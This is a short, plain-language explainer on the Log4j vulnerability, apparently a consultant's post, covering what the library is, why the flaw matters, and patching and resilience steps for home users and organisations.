Log4j: The Basics

If you’ve heard about something called ‘Log4j’ that’s got the Internet – and the cyber security establishment – rattled, you might be wondering what you need to do right now.

What is Log4j? Log4j is essentially an open-source widget that’s widely used by system developers to enable logging functionality (used for admin, operations, security audit, and so on) in the applications and services that they develop.

What’s the issue? A vulnerability has been identified in Log4j that allows attackers to break in to the systems on which Log4j is running, and from there steal confidential data, render them unavailable, or deploy other types of malware that can go on to cause further damage.

What’s the fix? The technical fix itself is simple. Updating Log4J to the latest version (2.16.0) removes the vulnerability.

So what’s all the fuss about? There are two big factors here. The first is that the vulnerability is very accessible (easy to exploit) for even novice cyber-criminals. Attackers have already been ‘on this’ for some days, and we’re likely to see many Log4j-related cyber attacks over the coming weeks. The second factor is that the systems on which Log4J is running are everywhere – embedded in systems used by home users, supporting SaaS solutions, and deployed by our suppliers to deliver services to our organisations.

What should we be doing about it? If you’re reading this and you’re a home user or one-person band with little dependence on corporate IT systems, the biggest step you can take is to check that your computer – and the applications that run on it – are bang up to date with the latest operating system and software versions. While you’re at it, take time to change passwords for online services you use, and make sure that those passwords are different from each other.

For larger companies the picture is more complex. At a minimum, you should:

• Check internal systems and applications for of use Log4j, and update to version 2.16.0 or later (this list of affected software, published by the Dutch NCSC, is a great resource to help you)
• Stay in regular contact with software vendors so that updates / patches supplied by them can be applied as soon as they become available
• Contact all your key suppliers and verify that they too are taking sensible steps to protect the networks and systems they use to deliver services to you
• Ensure in-house software development teams are fully aware of the vulnerability and update new systems accordingly
• Validate and update firewall rules
• Where you have the capability, monitor for external scanning of your networks, and for signs of unusual network / system activity.

Finally, it’s better to ensure that networks and systems are sufficiently resilient to cope with the impact of an attack than to assume that you can prevent an attack from hitting you in the first place. Examine your business continuity arrangements closely and ensure that measures designed to keep the business running in the event of a cyber event – such as backup and incident response processes – are up to date and have been tested.

If you’re worried about Log4j and are not sure where to start in terms of protecting your organisation, send me a Direct Message.